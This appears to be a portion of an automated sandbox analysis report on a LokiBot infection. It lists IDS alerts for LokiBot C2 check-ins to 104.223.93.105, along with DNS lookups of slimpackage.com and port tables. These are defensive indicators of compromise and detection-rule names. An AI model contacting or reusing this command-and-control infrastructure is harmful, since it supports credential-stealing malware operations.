              01/14/22-09:53:22.793268 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49772 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:22.793268 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49772 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:25.250388 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49773 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:25.250388 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49773 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:25.250388 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49773 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:26.628571 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49775 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:26.628571 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49775 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:26.628571 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49775 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:28.069977 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49781 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:28.069977 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49781 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:28.069977 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49781 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:29.435190 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49789 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:29.435190 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49789 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:29.435190 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49789 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:32.376585 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49806 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:32.376585 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49806 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:32.376585 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49806 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:34.797108 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49813 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:34.797108 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49813 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:34.797108 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49813 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:38.518335 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49814 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:38.518335 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49814 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:38.518335 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49814 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:42.966613 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49815 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:42.966613 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49815 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:42.966613 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49815 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:50.386625 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49821 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:50.386625 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49821 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:50.386625 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49821 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:54.269267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49822 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:54.269267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49822 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:54.269267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49822 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:57.036107 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49824 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:57.036107 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49824 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:57.036107 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49824 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:59.975080 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49825 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:59.975080 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49825 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:53:59.975080 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49825 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:02.086796 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49826 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:02.086796 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49826 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:02.086796 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49826 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:03.505879 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49832 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:03.505879 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49832 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:03.505879 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49832 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:04.907351 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49840 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:04.907351 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49840 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:04.907351 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49840 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:07.608302 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49852 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:07.608302 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49852 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:07.608302 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49852 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:10.712952 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49853 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:10.712952 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49853 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:10.712952 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49853 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:14.681172 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49854 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:14.681172 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49854 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:14.681172 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49854 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:17.053161 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49855 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:17.053161 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49855 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:17.053161 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49855 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:20.315523 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49856 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:20.315523 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49856 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:20.315523 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49856 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:22.278675 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49857 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:22.278675 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49857 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:22.278675 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49857 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:24.759273 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49858 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:24.759273 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49858 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:24.759273 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49858 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:26.128942 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49859 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:26.128942 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49859 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:26.128942 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49859 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:27.459033 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49860 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:27.459033 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49860 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:27.459033 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49860 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:28.746131 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49861 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:28.746131 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49861 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:28.746131 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49861 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:30.197089 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49862 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:30.197089 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49862 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:30.197089 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49862 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:31.498490 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49863 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:31.498490 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49863 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:31.498490 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49863 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:32.828735 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49864 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:32.828735 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49864 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:32.828735 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49864 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:34.246264 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49865 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:34.246264 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49865 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:34.246264 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49865 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:35.583283 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49866 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:35.583283 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49866 | 80 | 192.168.2.3 | 104.223.93.105
              01/14/22-09:54:35.583283 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49866 | 80 | 192.168.2.3 | 104.223.93.105

              Network Port Distribution

              TCP Packets


              UDP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jan 14, 2022 09:52:38.638278008 CET | 57459 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:38.657176971 CET | 53 | 57459 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:40.178615093 CET | 57875 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:40.198261976 CET | 53 | 57875 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:41.491287947 CET | 54154 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:41.610778093 CET | 53 | 54154 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:42.955676079 CET | 52806 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:43.096473932 CET | 53 | 52806 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:44.396620035 CET | 53910 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:44.515840054 CET | 53 | 53910 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:46.228964090 CET | 64021 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:46.248193026 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:48.792082071 CET | 60784 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:48.809930086 CET | 53 | 60784 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:50.168030977 CET | 51143 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:50.185595036 CET | 53 | 51143 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:51.662257910 CET | 56009 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:51.680947065 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:53.089287043 CET | 59026 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:53.108489990 CET | 53 | 59026 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:54.513963938 CET | 49572 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:54.534598112 CET | 53 | 49572 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:57.062278032 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:57.081229925 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:52:59.459840059 CET | 55102 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:52:59.479227066 CET | 53 | 55102 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:01.961615086 CET | 56236 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:01.981122017 CET | 53 | 56236 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:03.698502064 CET | 56527 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:03.715970993 CET | 53 | 56527 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:06.771358013 CET | 49559 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:06.790982008 CET | 53 | 49559 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:08.452569008 CET | 52650 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:08.471786976 CET | 53 | 52650 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:10.127753973 CET | 63297 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:10.148004055 CET | 53 | 63297 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:11.543363094 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:11.562706947 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:13.143388033 CET | 53615 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:13.262392044 CET | 53 | 53615 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:14.991425037 CET | 50728 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:15.010253906 CET | 53 | 50728 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:16.526405096 CET | 53777 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:16.543914080 CET | 53 | 53777 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:18.082562923 CET | 57106 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:18.101998091 CET | 53 | 57106 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:19.696553946 CET | 58058 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:19.715605974 CET | 53 | 58058 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:21.026103020 CET | 64367 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:21.045577049 CET | 53 | 64367 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:22.642846107 CET | 51539 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:22.662409067 CET | 53 | 51539 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:25.096461058 CET | 55393 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:25.115611076 CET | 53 | 55393 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:26.482763052 CET | 63456 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:26.502017975 CET | 53 | 63456 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:27.923367977 CET | 49250 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:27.941533089 CET | 53 | 49250 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:29.277138948 CET | 53079 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:29.298034906 CET | 53 | 53079 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:32.222469091 CET | 56706 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:32.240061998 CET | 53 | 56706 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:34.646564960 CET | 53569 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:34.666029930 CET | 53 | 53569 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:38.370861053 CET | 62855 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:38.389735937 CET | 53 | 62855 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:42.318813086 CET | 51046 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:42.336323023 CET | 53 | 51046 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:50.238415003 CET | 53465 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:50.257669926 CET | 53 | 53465 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:54.120655060 CET | 49290 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:54.140160084 CET | 53 | 49290 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:56.889389038 CET | 59754 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:56.908751011 CET | 53 | 59754 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:53:59.456651926 CET | 49234 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:53:59.475377083 CET | 53 | 49234 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:01.937850952 CET | 58720 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:01.956938028 CET | 53 | 58720 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:03.356400967 CET | 57447 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:03.375410080 CET | 53 | 57447 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:04.759175062 CET | 63583 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:04.778942108 CET | 53 | 63583 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:07.453048944 CET | 64099 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:07.472659111 CET | 53 | 64099 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:10.560174942 CET | 64610 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:10.580290079 CET | 53 | 64610 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:14.424412966 CET | 51989 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:14.443897963 CET | 53 | 51989 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:16.826210022 CET | 53152 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:16.845690966 CET | 53 | 53152 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:20.161289930 CET | 61590 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:20.180885077 CET | 53 | 61590 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:22.129714012 CET | 56077 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:22.149153948 CET | 53 | 56077 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:24.605570078 CET | 57951 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:24.624635935 CET | 53 | 57951 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:25.971417904 CET | 53276 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:25.991489887 CET | 53 | 53276 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:27.306365967 CET | 60135 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:27.325659990 CET | 53 | 60135 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:28.596005917 CET | 49849 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:28.613475084 CET | 53 | 49849 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:30.029385090 CET | 60253 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:30.048664093 CET | 53 | 60253 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:31.352067947 CET | 58706 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:31.371239901 CET | 53 | 58706 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:32.648261070 CET | 62677 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:32.668024063 CET | 53 | 62677 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:34.090576887 CET | 62595 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:34.109834909 CET | 53 | 62595 | 8.8.8.8 | 192.168.2.3
              Jan 14, 2022 09:54:35.436048031 CET | 51189 | 53 | 192.168.2.3 | 8.8.8.8
              Jan 14, 2022 09:54:35.455698967 CET | 53 | 51189 | 8.8.8.8 | 192.168.2.3

              DNS Queries

              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              Jan 14, 2022 09:52:38.638278008 CET | 192.168.2.3 | 8.8.8.8 | 0x73a6 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:40.178615093 CET | 192.168.2.3 | 8.8.8.8 | 0x2372 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:41.491287947 CET | 192.168.2.3 | 8.8.8.8 | 0x22db | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:42.955676079 CET | 192.168.2.3 | 8.8.8.8 | 0x10bc | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:44.396620035 CET | 192.168.2.3 | 8.8.8.8 | 0x81aa | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:46.228964090 CET | 192.168.2.3 | 8.8.8.8 | 0x43fd | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:48.792082071 CET | 192.168.2.3 | 8.8.8.8 | 0xfaa3 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:50.168030977 CET | 192.168.2.3 | 8.8.8.8 | 0x44d | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:51.662257910 CET | 192.168.2.3 | 8.8.8.8 | 0xade | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:53.089287043 CET | 192.168.2.3 | 8.8.8.8 | 0x8db2 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:54.513963938 CET | 192.168.2.3 | 8.8.8.8 | 0xc253 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:57.062278032 CET | 192.168.2.3 | 8.8.8.8 | 0xc65e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:59.459840059 CET | 192.168.2.3 | 8.8.8.8 | 0xc212 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:01.961615086 CET | 192.168.2.3 | 8.8.8.8 | 0x791e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:03.698502064 CET | 192.168.2.3 | 8.8.8.8 | 0x96c6 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:06.771358013 CET | 192.168.2.3 | 8.8.8.8 | 0x44e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:08.452569008 CET | 192.168.2.3 | 8.8.8.8 | 0xd242 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:10.127753973 CET | 192.168.2.3 | 8.8.8.8 | 0xe5aa | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:11.543363094 CET | 192.168.2.3 | 8.8.8.8 | 0x5691 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:13.143388033 CET | 192.168.2.3 | 8.8.8.8 | 0x7cc9 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:14.991425037 CET | 192.168.2.3 | 8.8.8.8 | 0x7ef9 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
